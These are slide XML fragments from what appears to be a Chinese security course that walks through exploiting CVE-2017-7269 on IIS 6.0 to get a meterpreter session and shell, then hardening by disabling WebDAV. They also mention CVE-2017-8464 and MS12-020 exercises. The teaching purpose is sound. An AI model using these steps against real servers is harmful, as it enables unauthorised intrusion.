          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3165475" y="5596255"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-6所示查看配置参数</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914400" y="176530"/>
            <a:ext cx="10515600" cy="6458585"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>6.输入run或exploit命令开始攻击，随后反弹meterpreter，如图3-2-7所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>.输入shell命令获取shell控制台，当转到c:\windows\system32\inetsrv&gt;提示符时，说明已经获得了shell的控制权，随后可以进行相关的渗透操作。如图3-2-8所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482618" descr="图3-2-7攻击成功反弹meterpreter"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2807970" y="887095"/>
            <a:ext cx="6383655" cy="1685290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 -2147482617" descr="图3-2-8获shell的控制权"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2444750" y="4448175"/>
            <a:ext cx="7066915" cy="1221740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632200" y="2572385"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如图3-2-7攻击成功反弹meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460115" y="6039485"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-8获shell的控制权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101"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110"/>
              <a:t>步骤三 漏洞加固</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3110"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3110"/>
              <a:t>1.针对cve_2017_7269漏洞的修复方法是禁用WebDAV，在IIS信息服务管理器中找到Web服务扩展禁止WebDAV服务，如图3-2-9所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3110"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="内容占位符 -2147482616" descr="图3-2-9 禁止WebDAV服务"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1559560" y="1915160"/>
            <a:ext cx="6132830" cy="3533775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725420" y="5749925"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-9 禁止WebDAV服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作系统漏洞是指计算机操作系统本身所存在的问题或技术缺陷，是不可避免的，其中拒绝服务漏洞是一种非常普遍、非常危险的系统漏洞，在各种操作系统、应用软件中广泛存在。拒绝服务是攻击者向服务器发送大量垃圾信息或干扰信息的方式攻击服务器，使服务器无法正常提供服务，甚至会使服务器瘫痪，一旦操作系统受到这种攻击就会有极大的危险，因此在日常的系统维护中，检测拒绝服务漏洞是一件十分重要的工作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252730" y="56515"/>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nSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>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根据项目实施的步骤，完成MS12_020漏洞利用与安全加固操作,要求能独立设置测试环境，进行漏洞利用和漏洞加固。</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文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="115665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【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>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8303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605" y="1577975"/>
          <a:ext cx="5202555" cy="4871720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="1699895"/>
                <a:gridCol w="448945"/>
                <a:gridCol w="991870"/>
                <a:gridCol w="991870"/>
              </a:tblGrid>
              <a:tr h="408940">
                <a:tc gridSpan="5">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项目名称：CVE-2017-7269漏洞渗透IIS6.0实现远程控制</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0957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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>Windows服务漏洞、CVE-2017-7269漏洞、WebDAV服务。</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漏洞利用与加固测试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865">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2240280"/>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549275">
                <a:tc gridSpan="1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项目名称：CVE-2017-7269漏洞渗透IIS6.0实现远程控制</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1010">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832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676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65034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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.2.1 利用CVE-2017-7269漏洞渗透IIS6.0实现远程控制</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706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>尝试用设置防火墙的方式加固系统漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="40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bldLvl="0" animBg="1"/>
      <p:bldP spid="82"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47711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>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1295705" y="-203755"/>
              <a:ext cx="1291989" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>3.2 Windows服务漏洞</a:t>
              </a:r>
              <a:endParaRPr sz="40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3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>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146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4416425" y="3996690"/>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kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.2.1 利用CVE-2017-7269漏洞渗透IIS6.0实现远程控制</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4416425" y="5194935"/>
            <a:ext cx="7033260" cy="953135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.2.2 利用CVE-2017-8464漏洞实现LINK文件远程代码执行 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>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80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="5096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4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="5096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5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="5096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6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="5096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7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833"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sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="5096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200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>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18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>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12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13"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5" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>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1" name="矩形 52"/>
                  <p:cNvSpPr/>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9" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>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7" name="AutoShape 112"/>
              <p:cNvSpPr/>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Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>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39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>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34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="58589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35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36"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41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>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47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
